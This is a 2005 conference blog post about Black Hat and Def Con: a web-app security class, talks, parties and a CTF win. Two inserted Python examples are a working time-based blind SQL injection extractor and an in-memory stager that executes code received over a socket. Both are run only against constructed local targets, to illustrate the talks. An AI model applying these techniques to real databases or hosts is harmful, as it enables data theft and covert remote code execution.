Friday, August 05, 2005

Black Hat and Def Con

Black Hat and Def Con! (by atlas)


Well, my friends. At last the week has come and gone. My family has done without me for 9 days, I've done without sleep for most of that, and my lips are swollen from desperately locking onto the firehose!


Web Application InSecurity


Starting out the week with NGS Software and Special Ops Security in the popular Web Application Software class. Two days was a little short for the original class, but it didn't lack. I was bored at first since they actually cover things as foreign to most developers as network topology and the security implications thereof. This has been my specialty for the past 4+ years.


I regained consciousness once we got started into the security aspects of web apps and server configs, though. Since these guys are pen-testers, not just security instructors, their approach was refreshing and took on much of the feel of an actual penetration test. I was rudely awakened by seemingly mundane things such as web server logging, when realizing how little useful information is logged by default when malicious code bangs it senseless. I guess I assumed that, but what I found intriguing were the settings to turn on valuable stuff!


Command Injection, SQL Injection, etc... It's all in there, and they didn't skimp on covering any of the good stuff. Each of the presenters was obviously accomplished in their field, and Chris Paget, the main instructor, even gave us a demo of his non-public time-based SQL injection tool, something that returns real data from the database server even when error messages are blocked, by using time-based encoding. Very slick stuff indeed.


More on Chris later.


Drinking at BH/DC


I was fortunate enough to eat and drink with some of the greatest names in the security field, and that includes Mr. Paget. While I was checking into the hotel, a large man lumbered up behind me lugging some hefty computer equipment. I think my comment was "There can only be one reason you're here, what class are you taking?" He informed me that he was teaching Web App (In)Security. I laughed and introduced myself as being in his class the next day. When time came for him to meet friends and have a beer, I asked to accompany him. Little did I know who I would be drinking with. Great people (and names you'll recognize) such as David Litchfield (Jr. and Sr.), Marc Litchfield, Timothy Mullin, Eli O (whose card titles him "Grand Visier" of BH/DC), Erik Pace Birkholz and the rest of SpecialOps (who co-taught the class), and the rest of NGS, including Markus and Gunter, who is leaving NGS to take over technical leadership of another large company that has floundered in recent years (good luck to you, Gunter!).


Overall they were great fun to hang out with and the conversations were very interesting, even covering politics and faith. Ahhh, the wonders of alcohol and tobacco. Throughout the week I was also fortunate enough to drink with Mudge (who is very interesting and likeable), Simple Nomad, my dear friend Jay Beale (who has a nasty little Sushi habit!), Dan Kaminski, and many others who I leave off only for brevity, not unimportance. Indeed I've left out many who are very dear to my heart. Oh, what the hack! If you've reached your limit, skip this...


Greetz to Plato, Steven, Structure, Robb, individual, Toby and Amber!, Doc Brown and the Plan B crew, Jason, Darwin's Bastards (yo, guys!), TheArrogantSnit, Invisigoth, HackerJoe, Bob, Satori, Verbal, John, any other Kenshoto guys I may have missed, Nicole and Richard from NTO.


I must admit, however, that while being bold enough to converse with well-known people like they were normal people (a duh!) is great, I don't think some people are used to it. One person halfway through the week asked me who the f*ck I was (I didn't take it badly, but it was curious). He said that when asked, everyone basically said that they thought I was *their* friend. When I asked if he thought me a social engineer, he said "Yes, exactly! Not that that is necessarily a bad thing..." heh. Amusing times.



One of the highlights of the week was deep conversations with Chris Paget, particularly about weaknesses of current computer intelligence theory. Very unfortunately Chris had to leave early for personal reasons. He was definitely missed.



Another highlight had to be Microsoft's twin-parties. One at the Pure (Caesars Palace) and a followup at the Tangerine (Treasure Island). Not only did I get to meet and chat with awesome people, including HDMoore and Kevin Mitnick, but the night was topped off by watching Jay Beale and his unique and energetic dance moves! Heck, he even got *me* out on the dance floor.



Briefings


Wow, what a rush! First off, I've never seen so much alcohol on stage.


But beyond that, let's discuss the firehose I've been drinking!


Starting the morning off with David Litchfield discussing advanced SQL injection techniques, including time-based, as well as Oracle patching woes. Aside from some frustration over sound difficulties, David was brilliant.
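Both the class demo of Chris Paget's tool and David Litchfield's talk turn on the same trick: when the application hides errors and output, the only thing left that the attacker controls is how long the server takes to answer, so each request asks one yes/no question and encodes the answer as a delay. The block below is an added example, not code from the class, the talk or either tool. The vulnerable lookup, its tables, the "admin"/"s3cret" row and the registered sleep() function are all constructed so it runs offline against an in-memory SQLite database; real engines have their own delay primitive (WAITFOR DELAY on SQL Server, SLEEP() on MySQL, pg_sleep() on PostgreSQL) and the attacker measures wall-clock time instead of the counter used here.

```python
import sqlite3

DELAY = 5.0       # seconds the injected branch "sleeps" when the condition is true
THRESHOLD = 2.5   # an elapsed time above this is read as a 1 bit


class VulnerableApp:
    """Constructed stand-in for the target: concatenates user input into SQL.

    SQLite has no delay primitive, so a sleep() function is registered that
    records the delay it was asked for instead of really sleeping; that
    recorded value stands in for the response time an attacker would clock.
    """

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE products (id INTEGER, name TEXT)")
        self.db.execute("CREATE TABLE users (name TEXT, password TEXT)")
        self.db.execute("INSERT INTO products VALUES (1, 'widget')")
        self.db.execute("INSERT INTO users VALUES ('admin', 's3cret')")  # constructed data
        self.db.create_function("sleep", 1, self._sleep)
        self.requested_delay = 0.0
        self.requests = 0

    def _sleep(self, seconds):
        self.requested_delay += seconds
        return 0

    def lookup(self, product_id):
        """Returns (rows, elapsed). Errors are swallowed, so the error-based
        channel is closed: a bad query and an empty result look the same."""
        self.requests += 1
        self.requested_delay = 0.0
        sql = "SELECT name FROM products WHERE id = " + product_id   # the bug
        try:
            rows = self.db.execute(sql).fetchall()
        except sqlite3.Error:
            rows = []
        return rows, self.requested_delay


def timing_oracle(app, condition):
    """One yes/no question. sleep() returns 0, so the WHERE clause is true in
    both branches and the page content is identical; only the time differs."""
    payload = f"1 AND (CASE WHEN ({condition}) THEN sleep({DELAY}) ELSE 0 END) = 0"
    _rows, elapsed = app.lookup(payload)
    return elapsed > THRESHOLD


def extract_int(app, expr, bits=8):
    """Recovers the integer value of a SQL expression, one bit per request."""
    value = 0
    for bit in range(bits):
        if timing_oracle(app, f"(({expr}) & {1 << bit}) > 0"):
            value |= 1 << bit
    return value


def extract_string(app, column, table, where):
    """Length first, then each character's code point, all through timing."""
    scalar = f"(SELECT {{}} FROM {table} WHERE {where})"
    length = extract_int(app, scalar.format(f"length({column})"))
    return "".join(
        chr(extract_int(app, scalar.format(f"unicode(substr({column}, {pos}, 1))")))
        for pos in range(1, length + 1)
    )


def demo():
    """Pulls the constructed admin password out through the timing channel."""
    app = VulnerableApp()
    secret = extract_string(app, "password", "users", "name = 'admin'")
    return secret, app.requests


if __name__ == "__main__":
    secret, requests = demo()
    print(f"recovered {secret!r} in {requests} requests")
```

The cost is what makes the technique "slow": eight requests per character plus eight for the length, so a six-character value takes 56 round trips, each one delayed by five seconds whenever the bit is set. Against a real server the threshold has to sit well above the network jitter, and the fetch of each row still returns the normal "widget" page, which is why ordinary content-diffing misses it and why log timing is worth watching.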


Mudge gave a talk on (what I think of as) basic-hacker-think... but the focus was on "functional fixation" and "learned immobility"... i.e. whoever thought a plane could be a weapon!? Well, somebody did. The rest of us likely suffered from functional fixation. Short of a few meanderings not directly related to the topic, Mudge proved he can handle lack of sleep and alcohol *very* well!


Spoonm and Skape from the MetaSploit Framework project were exceptional! They may have hit the basics of shellcoding a little too much for certain members of the crowd, but I can't say enough good things about the work they were detailing. I couldn't help but stick around afterward and catch the slides they felt compelled to skip to save time. Suffice it to say that Distributed Ninja and Meterpreter are payloads I will be learning in the near future. I did learn the unfortunate news that they will be forcing me to learn Ruby if I want to contribute (or read) Msf 3.0. I hear Ruby's great, but that's not a new theme for me (see Python/KenShoto later on). dN and Meterpreter are the next evolution of Syscall proxies, basically a snippet of code which accepts code from your system and executes it on the remote machine. Nothing is written to disk and Meterpreter even allows you to "migrate" which process it runs in. dN runs on Linux, Meterpreter runs on Windows. They also clarified just what "stagers" are.
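To make the stager idea concrete: the piece that has to fit in the exploit is tiny and knows only how to read a frame off the channel and run it, and everything else (the task loop, the "accept code and execute it" part) arrives over that same channel and lives only in memory. The block below is an added example of that architecture, not Metasploit code and not Distributed Ninja or Meterpreter. It runs both ends in one process over socket.socketpair(), with a four-byte length prefix as the (assumed) framing, so nothing touches the network or the disk; a real payload would be native code, not Python source, and would open a socket back to the operator instead.

```python
import socket
import struct
import threading


def recv_exact(sock, n):
    """Reads exactly n bytes; a short read means the channel died."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("channel closed")
        buf += chunk
    return buf


def send_blob(sock, data):
    """Assumed framing: 4-byte big-endian length, then the bytes."""
    sock.sendall(struct.pack(">I", len(data)) + data)


def recv_blob(sock):
    (length,) = struct.unpack(">I", recv_exact(sock, 4))
    return recv_exact(sock, length)


def stage0(sock):
    """The stager: the only part that must fit wherever the payload lands.

    It reads one frame, runs it as the second stage and hands it the channel
    it arrived on. Nothing is written to disk; the code exists only in this
    process's memory."""
    stage1 = recv_blob(sock)
    namespace = {"sock": sock, "send_blob": send_blob, "recv_blob": recv_blob}
    exec(compile(stage1, "<stage1>", "exec"), namespace)


# The second stage, shipped over the channel as source. It loops on tasks,
# runs each one in memory and frames the result (or the exception) back.
STAGE1 = b"""
def task_loop(sock):
    while True:
        task = recv_blob(sock)
        if task == b"exit":
            return
        scope = {}
        try:
            exec(compile(task, "<task>", "exec"), scope)
            send_blob(sock, repr(scope.get("result")).encode())
        except Exception as exc:
            send_blob(sock, ("error: " + repr(exc)).encode())

task_loop(sock)
"""


def operator(sock, tasks):
    """Attacker side: push stage 1, then push tasks and collect the answers."""
    send_blob(sock, STAGE1)
    results = []
    for task in tasks:
        send_blob(sock, task)
        results.append(recv_blob(sock).decode())
    send_blob(sock, b"exit")
    return results


def _remote_side(sock):
    """Closes the socket when stage 0 ends so the operator never hangs."""
    try:
        stage0(sock)
    finally:
        sock.close()


def run_demo(tasks=None):
    """Runs the 'remote' end in a thread over a socketpair: fully local."""
    if tasks is None:
        tasks = [
            b"import os\nresult = os.getpid() > 0",
            b"result = sum(range(10))",
            b"result = 1 / 0",   # exercises the error path
        ]
    ours, theirs = socket.socketpair()
    remote = threading.Thread(target=_remote_side, args=(theirs,), daemon=True)
    remote.start()
    try:
        return operator(ours, tasks)
    finally:
        remote.join(timeout=5)
        ours.close()
        theirs.close()


if __name__ == "__main__":
    for line in run_demo():
        print(line)
```

The trust model is the one the talk implied and the one a defender should notice: the stager will run whatever the channel delivers, so the channel is the whole security boundary, and a host-based tool that only watches the filesystem sees nothing because no file ever exists.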



One of the stars of the show was definitely Johnny Long (johnny.ihackstuff.com). While I have a long history of appreciating Johnny, his speech was no letdown. Particularly his wit when finding "googledorks". I really liked the comments about government findings ;) Buy Johnny's book. It's bound to be amusing and informative!



Not all Black Hat Briefings were as interesting to me. I attended one speaker who must have been a college professor (look and droning speech) who spoke on restricted computing environments, or sandboxes. While the potential impact was decent and the material could have been interesting (and he had *really cool* transitions in his preso), his presentation method lacked gusto and I was underwhelmed. Many folks didn't wait it out and left. I stuck around but to no avail.



DefCon


Yes, I know... I've already worn you out before getting to the good part. The truth is, I was so heads-down involved in the Capture the Flag (CTF) hacking competition that I don't have much to say.


The Kenshoto hacker group took over the CTF this year after the longstanding "Ghetto Hackers" hosts decided to retire. This being my first DefCon I can't speak to the transition. All I can say is that Kenshoto did an absolutely incredible job. There were some flubs along the way and yes, it cost me time, but overall I was so amazed at the complete package they put together, their thoroughness, that I can't even complain. They even included a feedback session afterwards so we could discuss how things turned out. I found it amusing that they did this prior to anyone learning who had won ;) Better that way, I think. What was so amazing?


From the moment I walked into the access-controlled room I felt like I was walking into a high-intensity playground/dance-club. Dim lights, technothrash music, the Black/Green color scheme, and the Blue siren-light all contributed to a feeling of greatness. The Kenshoto guys had their stuff together, even down to the green on black Kenshoto t-shirts which had different phrases each day...



Each night Caezar hosted parties which combined technogeeks with alcohol and saw amusing results. I was only able to catch two of the three parties, but the two I attended were pretty cool. Saturday I sat next to Dan Kaminski and a Microsoft employee and bashed and postured and laughed until it hurt. That and discussions of Python being better than Perl (I'm not convinced yet), and of course watching Eli O dance while magically keeping two or three acrylic spheres afloat and tracing around his body parts... they all contributed to a great time. Sunday's party was around pool 2 at the Alexis Park hotel, and enhanced by tossing a glow-stick inside the 1-gallon juice jug filled with liquor-surprise... Tossing that around was probably more fun than the beach-balls. I got a chance to slow down and have a cool talk with Snit from Kenshoto, and ponder the impact of moving from my current address to the Virginia area. hmmmmm...... Tempting.



Falling asleep while _____ (version 2)


Well, I'm home now. After two hours sleep on Sunday, the plane rides were filled with the stuff. I intended to continue reversing CTF binaries, but alas that never happened. I just got around to that last night.


During the CTF Qualification round I found myself sleep-typing. At 5am it's amazing what the fingers have to say when you stop ordering them around and let their creative side show. "SegFailt os if it weren' groumedeor"


Well, since being home, I think I've topped it. I have actually fallen asleep while reading to my kids! "blah blah bla", he said............. <"daddy? Who said? Daddy???"> DOH!


Hopefully after some recovery I'll be able to better fit this new-found habit into my life without such extreme consequences.



By now, everyone is normally asking the question "How did you do at the CTF?" https://www.kenshoto.com/scores.html


Short and skinny? I didn't do nearly as well as I wished I had. And I won the individual (Ronin) contest, beating most of the teams.


Many thanks to those around me who I made alliances with, particularly the Darwin's Bastards, and of course my dear friend Plato, who very well could have beaten me. Greetz to the Shellphish and Sk3wl of R00t teams for a job very well done.


I won? and I'm not happy with that? Frankly, no. And it's not because I didn't beat the two top teams. It's about "my game" and no one else. I could have done more and done better and faster. I have much improvement to do this next year, and it can only come from more practice and better skillz. Why am I not happy? Because I resorted to lamer tactics of "low-hanging fruit" and social engineering rather than more challenging things. "Bottom line" is that I did what it took to win, but it's like playing defensive pool rather than simply shooting well. Next year I hope to run the table off the break.



Special nod to the friends I will keep out of this, especially Plato, Robb, Chris Paget, J-sLam, Snit and Invisigoth, drb and Toby.
